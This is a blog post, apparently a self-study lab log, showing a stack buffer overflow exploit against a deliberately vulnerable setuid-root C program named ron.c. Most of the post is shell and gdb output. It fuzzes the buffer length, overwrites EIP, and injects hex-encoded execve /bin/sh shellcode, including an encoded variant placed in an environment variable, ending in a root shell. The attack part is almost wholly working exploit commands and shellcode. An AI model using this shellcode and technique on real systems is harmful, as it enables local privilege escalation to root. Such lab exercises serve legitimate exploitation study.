break a time, with break the c0de…

Posts tagged “vulnerable

play with ron.c


i found in internet about this source .
but exploitation trick is about oldstyle, so it’s useless .
so i’ve been challenged in .
play with ron.c

gunslinger@localhost:~/bof$ vim ron.c
gunslinger@localhost:~/bof$ cat ron.c
 /**
    * Name: StackVuln.c
    * Author: Ron Bowes
    * Date: March 24, 2004
    * To compile: gcc StackVuln.c -o StackVuln
    * Requires: n/a
    *
    * Purpose: This code is vulnerable to a stack overflow if more than
    * 20 characters are entered. The exploit for it was written by
    * Jon Erickson in Hacking: Art of exploitation, but I wrote
    * this vulnerable code independently.
    */
    #include <stdio.h>
    #include <string.h>
    int main(int argc, char *argv[])
    {
        char string[40];
        strcpy(string, argv[1]);
        printf("The message was: %s\n", string);
        printf("Program completed normally!\n\n");
        return 0;
    }


gunslinger@localhost:~/bof$ gcc -g -fno-stack-protector -mpreferred-stack-boundary=2 -o ron ron.c
gunslinger@localhost:~/bof$ sudo chown root:root ron
[sudo] password for gunslinger: 
gunslinger@localhost:~/bof$ sudo chmod 4755 ron
gunslinger@localhost:~/bof$ ./ron
Segmentation fault
gunslinger@localhost:~/bof$ ./ron a
The message was: a
Program completed normally!

gunslinger@localhost:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' 			[Ok]
[*] Checking null on randomize_va_space 				[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 40 byte(s)
[!] Application got segmentation fault by giving 40 byte(s) into buffer !!

gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 39'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!

gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!

Segmentation fault
gunslinger@localhost:~/bof$ gdb -q ron
(gdb) list
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
(gdb) run `perl -e 'print "A" x 400'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 400'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `perl -e 'print "A" x 40'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 41'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 41'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 42'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 42'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 43'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 43'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 44'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 44'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7e7b703 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 45'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 45'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7e70042 in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 46'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 46'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb) run `perl -e 'print "A" x 47'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 47'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) run `perl -e 'print "A" x 48'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 48'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x1d	29
edx            0xb7fc50d0	-1208201008
ebx            0xb7fc3ff4	-1208205324
esp            0xbffff4d0	0xbffff4d0
ebp            0x41414141	0x41414141
esi            0x8048480	134513792
edi            0x8048370	134513520
eip            0x41414141	0x41414141
eflags         0x10246	[ PF ZF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) list
19	        printf("The message was: %s\n", string);
20	        printf("Program completed normally!\n\n");
21	        return 0;
22	    }
23	
(gdb) list 1
1	 /**
2	    * Name: StackVuln.c
3	    * Author: Ron Bowes
4	    * Date: March 24, 2004
5	    * To compile: gcc StackVuln.c -o StackVuln
6	    * Requires: n/a
7	    *
8	    * Purpose: This code is vulnerable to a stack overflow if more than
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list 2
1	 /**
2	    * Name: StackVuln.c
3	    * Author: Ron Bowes
4	    * Date: March 24, 2004
5	    * To compile: gcc StackVuln.c -o StackVuln
6	    * Requires: n/a
7	    *
8	    * Purpose: This code is vulnerable to a stack overflow if more than
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
19	        printf("The message was: %s\n", string);
20	        printf("Program completed normally!\n\n");
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run test to see where esp is
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron test to see where esp is

Breakpoint 1, main (argc=7, argv=0xbffff544) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) i r esp
esp            0xbffff488	0xbffff488
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`

Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
                              �Rh//shh/bin��RS��̀\���\���\���
Program completed normally!


Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) shell su
Password: 
root@localhost:/home/gunslinger/bof# gdb -q bof
(gdb) Quit
(gdb) quit
root@localhost:/home/gunslinger/bof# gdb -q ron
(gdb) list
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`

Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
                              �Rh//shh/bin��RS��̀\���\���\���
Program completed normally!


Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
root@localhost:/home/gunslinger/bof# q
bash: q: command not found
root@localhost:/home/gunslinger/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"  > shellcode3.bin
root@localhost:/home/gunslinger/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin)
root@localhost:/home/gunslinger/bof# getenv
bash: getenv: command not found
root@localhost:/home/gunslinger/bof# ./getenv
bash: ./getenv: No such file or directory
root@localhost:/home/gunslinger/bof# ls
bbf.py  bof1    bof2.c  bof.c    bufferbruteforce.py  displant.c  easy.c  get_env    man-pages    ron             shellcode.bin  smashme2    vanish.c
bf2.py  bof1.c  bof3    brute    core                 easy2       expl    get_env.c  objdasm.vim  ron.c           shellcode.c    smashme2.c
bof     bof2    bof3.c  brute.c  displant             easy2.c     expl.c  hts        passwd.php   shellcode3.bin  smashme        smashme.c
root@localhost:/home/gunslinger/bof# ./get_env
Segmentation fault
root@localhost:/home/gunslinger/bof# ./get_env PAYLOAD
PAYLOAD is at 0xbffffe78
root@localhost:/home/gunslinger/bof# printf "%x\n"  $((0xbffffe78 + 100))
bffffedc
root@localhost:/home/gunslinger/bof# \xdc\xfe\xff\xbf
bash: xdcxfexffxbf: command not found
root@localhost:/home/gunslinger/bof# /bof2 $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
bash: /bof2: No such file or directory
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2. "\xdc\xfe\xff\xbf" x 10')
String found where operator expected at -e line 1, near "2. "\xdc\xfe\xff\xbf""
	(Missing operator before  "\xdc\xfe\xff\xbf"?)
Number found where operator expected at -e line 1, near "x 10"
	(Do you need to predeclare x?)
syntax error at -e line 1, near "2. "\xdc\xfe\xff\xbf""
Execution of -e aborted due to compilation errors.
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 3 . "\xdc\xfe\xff\xbf" x 10')
The message was: �������������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 4 . "\xdc\xfe\xff\xbf" x 10')
The message was: ��������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 5 . "\xdc\xfe\xff\xbf" x 10')
The message was: ���������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 6 . "\xdc\xfe\xff\xbf" x 10')
The message was: ����������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 7 . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 8 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������������
Program completed normally!

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAMEOVER
GAMEOVER
# exit
root@localhost:/home/gunslinger/bof# 
Advertisements